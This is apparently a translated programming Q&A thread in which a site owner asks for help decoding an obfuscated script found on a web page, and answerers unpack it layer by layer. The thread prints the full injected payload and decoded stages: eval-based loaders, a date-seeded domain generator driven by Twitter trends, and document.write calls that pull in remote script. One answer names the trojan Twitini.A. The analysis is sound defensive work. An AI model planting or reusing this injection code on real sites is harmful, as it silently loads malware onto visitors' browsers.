代码之家 › 专栏 › 技术社区 › TCCV

帮助解除JS攻击

deobfuscation security javascript

TCCV · 技术社区 · 14 年前

谢谢, 提姆

编辑:下面是代码(一行,在脚本标记之间)。这是发给我的,我没有访问服务器的权限。

var $a="Z6fpZ3dZ22Z2524aZ253dZ2522dw(dcsZ2528cuZ252c14Z2529);Z2522;Z22;ceZ3dZ22arZ2543oZ2564eZ2541Z2574Z25280Z2529^Z2528Z2527Z2530xZ25300Z2527+eZ2573)Z2529)Z253b}}Z22;dzZ3dZ22Z2566unZ2563tZ2569onZ2520dw(Z2574)Z257bcaZ253dZ2527Z252564oZ252563umZ252565ntZ252eZ252577Z2572Z252569Z2574Z252565(Z252522Z2527;ceZ253dZ2527Z252522Z2529Z2527;cbZ253dZ2527Z25253cscZ252572Z252569pZ252574 Z25256cZ252561nZ25256Z2537uZ252561geZ25253Z2564Z25255cZ252522Z256aavZ252561Z252573cZ252572ipZ25257Z2534Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572Z252569ptZ25253eZ2527;winZ2564owZ255bZ2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522]Z2528uneZ2573cZ2561Z2570e(Z2574))Z257d;Z22;cbZ3dZ22e(dZ2573);Z2573tZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0;Z2569Z253cdZ2573.Z256cZ256Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;dfZ7bl;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ225ngZ2574h;Z2569Z252bZ252b)Z257btmpZ253ddsZ252esliZ2563e(Z2569Z252cZ2569+1)Z253bsZ22;stZ3dZ22Z2573Z2574Z253dZ2522$aZ253dsZ2574;Z2564cZ2573Z2528Z2564Z2561Z252bZ2564bZ252bZ2564Z2563Z252bdZ2564+Z2564Z2565Z252c1Z2530Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253d$Z2561;Z2522;Z22;caZ3dZ22Z2566Z2575nctZ2569Z256fnZ2520Z2564Z2563s(dZ2573,Z2565s)Z257bdsZ253duneZ2573caZ2570Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cdZ3dZ22Z2574Z253dstZ252bStrZ2569nZ2567.fZ2572Z256fmCZ2568arZ2543oZ2564e((Z2574mp.Z2563hZ22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;czZ3dZ22Z2566uZ256ecZ2574ioZ256e cZ257aZ2528czZ2529Z257bretZ2575rn Z2563a+cZ2562+Z2563cZ252bZ2563d+Z2563e+cZ257a;Z257d;Z22;Z69Z66Z20(doZ63uZ6denZ74.coZ6fkiZ65Z2eiZ6edZ65xOfZ28Z27rf5Z666Z64sZ27)Z3dZ3d-1)Z7bfunctionZ20cZ61llbZ61ckZ28x)Z7bwinZ64Z6fZ77Z2etw Z3d xZ3bvarZ20Z64 Z3d nZ65wZ20DaZ74e()Z3bd.Z73eZ74Z54Z69Z6dZ65(x[Z22asZ5foZ66Z22]*1Z300Z30)Z3bZ76aZ72 hZ20Z3d d.Z67Z65Z74UZ54Z43HZ6fuZ72s(Z29;wiZ6edoZ77.Z68 Z3d h;Z69fZ20(hZ20Z3e 8)Z7bd.Z73etUZ54Z43DatZ65(dZ2egeZ74Z55Z54Z43Z44ateZ28) Z2dZ20Z32)Z3b}elZ73eZ7bd.sZ65tUTZ43Z44Z61teZ28dZ2egetZ55TZ43DatZ65()Z20- 3Z29;Z7dwiZ6edZ6fw.gZ64 Z3d d;vZ61r tZ69me Z3d nZ65Z77 AZ72raZ79(Z29;Z76ar Z73Z68iZ66tZ49ndeZ78 Z3d Z22Z22;tiZ6dZ65[Z22yeZ61rZ22] Z3d dZ2egZ65tUZ54CZ46ullZ59eaZ72(Z29Z3btZ69Z6de[Z22mZ6fZ6etZ68Z22] Z3d Z64Z2egeZ74Z55Z54CMZ6fnthZ28)Z2bZ31;tZ69me[Z22Z64Z61yZ22] Z3dZ20d.Z67etZ55TZ43Z44atZ65()Z3bif Z28d.gZ65Z74UTZ43Z4donZ74h()Z2b1 Z3c 1Z30)Z7bshiftZ49ndeZ78 Z3d tiZ6de[Z22yeaZ72Z22] Z2b Z22Z2d0Z22 + (dZ2egetZ55TZ43MonZ74Z68()Z2b1Z29;}eZ6cZ73Z65Z7bshiZ66Z74IZ6edZ65x Z3d tiZ6deZ5bZ22yearZ22] +Z20Z22-Z22 +Z20(Z64.geZ74UTZ43MZ6fnZ74hZ28Z29+Z31);Z7difZ20(dZ2egetZ55TCDZ61te(Z29 Z3c 10Z29Z7bshifZ74InZ64Z65xZ20Z3dshifZ74Z49ndeZ78Z20+ Z22-0Z22 + Z64Z2egetZ55TCDZ61teZ28);}Z65Z6csZ65Z7bshiZ66tInZ64eZ78 Z3dZ20shZ69fZ74IZ6edexZ20+ Z22-Z22 Z2b Z64.Z67etZ55Z54Z43DatZ65();Z7ddZ6fcumZ65Z6eZ74.Z77rZ69teZ28Z22Z3cscrZ22+Z22ipt lZ61nguZ61geZ3djavZ61sZ63rZ69Z70Z74Z22+Z22 sZ72cZ3dZ27http:Z2fZ2fseaZ72chZ2etwZ69tteZ72.cZ6fmZ2ftZ72eZ6edsZ2fdailZ79.Z6aZ73on?Z64Z61tZ65Z3dZ22+ shiftZ49nZ64eZ78+Z22&cZ61llZ62acZ6bZ3dcallZ62acZ6bZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} functiZ6fn Z63aZ6clZ62aZ63kZ32(x)Z7bwZ69ndoZ77.tZ77 Z3d x;Z73c(Z27rZ665Z66Z36dsZ27,2,Z37)Z3bZ65vaZ6c(uZ6eescZ61peZ28Z64zZ2bcZ7aZ2boZ70+stZ29+Z27dwZ28dz+Z63z(Z24Z61+stZ29);Z27);Z64oZ63umZ65ntZ2ewZ72Z69te(Z24a);Z7dZ64ocuZ6deZ6eZ74.Z77riZ74e(Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearchZ2etwZ69tteZ72.Z63oZ6dZ2fZ69mZ61gZ65Z73Z2fseaZ72Z63hZ2frsZ73.pnZ67Z27 wiZ64tZ68Z3d1Z20Z68eiZ67htZ3d1 sZ74ylZ65Z3dZ27visibiZ6citZ79Z3ahiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt laZ6eguZ61geZ3djZ61vZ61sZ63ripZ74Z22+Z22 srZ63Z3dZ27http:Z2fZ2fseaZ72ch.Z74wZ69tZ74erZ2eZ63omZ2ftZ72eZ6edsZ2fdaZ69lyZ2ejZ73Z6fn?cZ61llZ62Z61cZ6bZ3dcallbZ61Z63Z6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6csZ65Z7b$aZ3dZ27Z27};functiZ6fZ6e scZ28Z63nm,Z76Z2cedZ29Z7bvarZ20eZ78Z64Z3dnew Z44atZ65()Z3beZ78Z64.Z73Z65tDZ61Z74Z65Z28Z65xdZ2eZ67etZ44ateZ28)+Z65d);Z64ocZ75meZ6et.cZ6foZ6bieZ3dZ63nZ6d+ Z27Z3dZ27 +esZ63apeZ28vZ29+Z27Z3beZ78pirZ65sZ3dZ27+exdZ2etoZ47Z4dTZ53tZ72Z69Z6eZ67Z28);Z7d;";
var ez=window;ez[String.fromCharCode(101,118,97)+"l"](fds()); 
function asd(s)
{
    r="";
    for(i=0;i<s.length;i++)
    {
    if(s.charAt(i)=="Z")
    {
        s1="%"
    }
    else
    {
        s1=s.charAt(i)
    }
    r=r+s1;
    }
    return unescape(r);
}
function fds()
{
    return asd($a);
}

再次编辑:我之所以选择马修·弗拉申,是因为他、鲁斯·卡姆和其他人对这一特殊攻击的作用以及如何进行这类攻击都有很大的帮助。马修碰巧跳得最快。

4 回复 | 直到 14 年前

davenpcj 14 年前

好的,第一阶段。这是相对容易的。 String.fromCharCode(101,118,97) 是“eva”,所以它调用eval函数 fds() . 这反过来也只是打电话 asd ,这实际上只是用%替换“Z”。在我们取消scape之后,我们得到了他们想要的代码 eval

op="%24a%3d%22dw(dcs%28cu%2c14%29);%22;";
ce="ar%43o%64e%41%74%280%29^%28%27%30x%300%27+e%73)%29)%3b}}";
;cb="e(d%73);%73t%3dtmp%3d%27%27;for(%69%3d0;%69%3cd%73.%6c%6";
da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;df{l;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cc="5ng%74h;%69%2b%2b)%7btmp%3dds%2esli%63e(%69%2c%69+1)%3bs";
st="%73%74%3d%22$a%3ds%74;%64c%73%28%64%61%2b%64b%2b%64%63%2bd%64+%64%65%2c1%30%29;%64w%28s%74)%3b%73t%3d$%61;%22;";
ca="%66%75nct%69%6fn%20%64%63s(d%73,%65s)%7bds%3dune%73ca%70";
dc="rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
dd="08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
cd="%74%3dst%2bStr%69n%67.f%72%6fmC%68ar%43o%64e((%74mp.%63h";
db="7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
de="!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";
cz="%66u%6ec%74io%6e c%7a%28cz%29%7bret%75rn %63a+c%62+%63c%2b%63d+%63e+c%7a;%7d;";
  if (document.cookie.indexOf("rf5f6ds") == -1) {

        function callback(x) {
            window.tw = x;
            var d = new Date;
            d.setTime(x.as_of * 1000);
            var h = d.getUTCHours();
            window.h = h;
            if (h > 8) {
                d.setUTCDate(d.getUTCDate() - 2);
            } else {
                d.setUTCDate(d.getUTCDate() - 3);
            }
            window.gd = d;
            var time = new Array;
            var shiftIndex = "";
            time.year = d.getUTCFullYear();
            time.month = d.getUTCMonth() + 1;
            time.day = d.getUTCDate();
            if (d.getUTCMonth() + 1 < 10) {
                shiftIndex = time.year + "-0" + (d.getUTCMonth() + 1);
            } else {
                shiftIndex = time.year + "-" + (d.getUTCMonth() + 1);
            }
            if (d.getUTCDate() < 10) {
                shiftIndex = shiftIndex + "-0" + d.getUTCDate();
            } else {
                shiftIndex = shiftIndex + "-" + d.getUTCDate();
            }
            document.write("<scr" + "ipt language=javascript" + " src='http://search.twitter.com/trends/daily.json?date=" + shiftIndex + "&callback=callback2'>" + "</scr" + "ipt>");
        }


      function callback2(x) {
            window.tw = x;
            sc("rf5f6ds", 2, 7);
            function dw(t)
            {
                ca='%64o%63um%65nt.%77r%69t%65(%22';
                ce='%22)';
                cb='%3csc%72%69p%74 %6c%61n%67u%61ge%3d%5c%22jav%61%73c%72ip%74%5c%22%3e';
                cc='%3c%5c%2fscr%69pt%3e';
                eval(unescape(t))
            };
            $a="dw(dcs(cu,14));";
            function dw(t)
            {
                ca='%64o%63um%65nt.%77r%69t%65(%22';ce='%22)';
                cb='%3csc%72%69p%74 %6c%61n%67u%61ge%3d%5c%22jav%61%73c%72ip%74%5c%22%3e';
                cc='%3c%5c%2fscr%69pt%3e';
                eval(unescape(t))
            };
            document.write("<script language=\"javascript\"><\/script>t=st+String.fromCharCode((tmp.ch")
            dw(dcs(cu,14));
            $a=st;
            dcs(da+db+dc+dd+de,10);
            dw(st);
            st=$a;

            document.write($a);
      }

      document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <script language=javascript src='http://search.twitter.com/trends/daily.json?callback=callback'></script>");
    } else {
        $a = "";
    }

    function sc(cnm, v, ed) {
        var exd = new Date;
        exd.setDate(exd.getDate() + ed);
        document.cookie = cnm + "=" + escape(v) + ";expires=" + exd.toGMTString();
    }

我解码了上面的变量。cz很吸引人。上面写着 cz="function cz(cz){return ca+cb+cc+cd+ce+cz;};";

function dcs(ds,es){
    ds=unescape(ds);
    st=tmp='';
    for(i=0;i<ds.l%65ngth;i++){
        tmp=ds.slice(i,i+1);
        st=st+String.fromCharCode((tmp.ch! 9M0;0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0$90;0~e}9050! 9M+0}~dxSx0-0|uddubcK88dy}uK7}~dx7M0;0~e}9050"%9M0;0|uddubcK88dy}uK7}~dx7M0:0~e}9050"%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0&9050"'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050"$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx"0;0}~dxSx0;0iuqbSx!0;0tqiSx0;0}~dxcKdy}uK7}~dx7M0=0!M0;07>s}79+m

我很难理解最后一个 st=st+String.fromCharCode... 但也有一部分。

仍在向前耕耘。如果您查看解码值,则st为 st="st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";"; 然后加上“d”行,就变成这样:

st="
        $a=st;
        dcs(fqb0t-7vrs}vyb>s}7+0fqb0cxyvdY~tuh0-0 +vb08fqb0y0y~0gy~tg>dg>dbu~tc9kyv08gy~tg>x0.0(0660gy~tg>x0,0"!0660y>y~tuh_v870 '790.0=!9kcxyvdY~tuh0-0gy~tg>dg>dbu~tcKyMK$M>aeubi>sxqbStuQd8!90;0gy~tg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~tg>x0,0)0ll00gy~tg>x0.0" 90660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~tg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0! 0;gy~tg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0 09kcxyvdY~tuh0-0gy~tg>dg>dbu~tcKyMK&M>aeubi>sxqbStuQd8!90;0'0;gy~tg>dg>dbu~tcKyMK&M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0 9kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tg>wt>wudEDSVe||Iuqb89+dy}uK7}~dx7M0-0gy~tg>wt>wudEDS]~dx89;!+dy}uK7tqi7M0-0gy~tg>wt>wudEDSTqdu89+fqb0t-7vrs}vyb>s}7+fqb0}~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07h{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<77<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<"<#<$<%<&<'<(<)9+ve~sdy~0Sq|se|qdu]qwys^e}rub8tqi<0}~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx"<0}~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!  +iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060 hQQ90;0~e}9050&#9050"&M0;0|uddubcK888dy}uK7iuqb7M060 hQQ90,,0"90;0~e}9050"%M+iuqbSx"0-0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0#90;0~e}9050! 9M0;0|uddubcK8888dy}uK7iuqb7M060 h##!!90..0$90;0~e}9050! 9M+0}~dxSx0-0|uddubcK88dy}uK7}~dx7M0;0~e}9050"%9M0;0|uddubcK88dy}uK7}~dx7M0:0~e}9050"%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0&9050"'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050"$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx"0;0}~dxSx0;0iuqbSx!0;0tqiSx0;0}~dxcKdy}uK7}~dx7M0=0!M0;07>s}79+m,10);
        dw(st);
        st=$a;
    ";

asciimo 14 年前

此特洛伊木马程序名为Twitini.A,记录如下: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan%3AJS%2FTwitini.A

Matthew Farwell 14 年前

好的,这应该很简单。

var ez=window;ez[String.fromCharCode(101,118,97)+"l"](fds());

只是一个电话 eval

要知道要计算什么,我们必须破译字符串。我们应该能够通过运行 asd 函数。。。

这给了我们

op = '$a="dw(dcs(cu,14));";';
ce = "arCodeAt(0)^('0x00'+es)));}}"
dz = "function dw(t){ca='%64o%63um%65nt.%77r%69t%65(%22';ce='%22)';cb='%3csc%72%69p%74 %6c%61n%67u%61ge%3d%5c%22jav%61%73c%72ip%74%5c%22%3e';cc='%3c%5c%2fscr%69pt%3e';window["e"+\"\"+ \"v\"+\"al\"](unescape(t))};"
cb = "e(ds);st=tmp='';for(i=0;i<ds.l%6";
da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;df{l;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cc = "5ngth;i++){tmp=ds.slice(i,i+1);s";
st = 'st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";';
ca = "function dcs(ds,es){ds=unescap";
dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
cd = "t=st+String.fromCharCode((tmp.ch";
db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
de = "!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";
cz = /* "function cz(cz){return ca+cb+cc+cd+ce+cz;};"; */ 
        "function cz(cz){return \"function dcs(ds,es){ds=unescape(ds);st=tmp='';for(i=0;i<ds.l%65ngth;i++){tmp=ds.slice(i,i+1);st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));}}\"+cz;};";
if (document.cookie.indexOf('rf5f6ds') == -1) {
    function callback(x) {
        window.tw = x;
        var d = new Date();
        d.setTime(x["as_of"] * 1000);
        var h = d.getUTCHours();
        window.h = h;
        if (h > 8) {
            d.setUTCDate(d.getUTCDate() - 2);
        } else {
            d.setUTCDate(d.getUTCDate() - 3);
        }
        window.gd = d;
        var time = new Array();
        var shiftIndex = "";
        time["year"] = d.getUTCFullYear();
        time["month"] = d.getUTCMonth() + 1;
        time["day"] = d.getUTCDate();
        if (d.getUTCMonth() + 1 < 10) {
            shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
        } else {
            shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
        }
        if (d.getUTCDate() < 10) {
            shiftIndex = shiftIndex + "-0" + d.getUTCDate();
        } else {
            shiftIndex = shiftIndex + "-" + d.getUTCDate();
        }
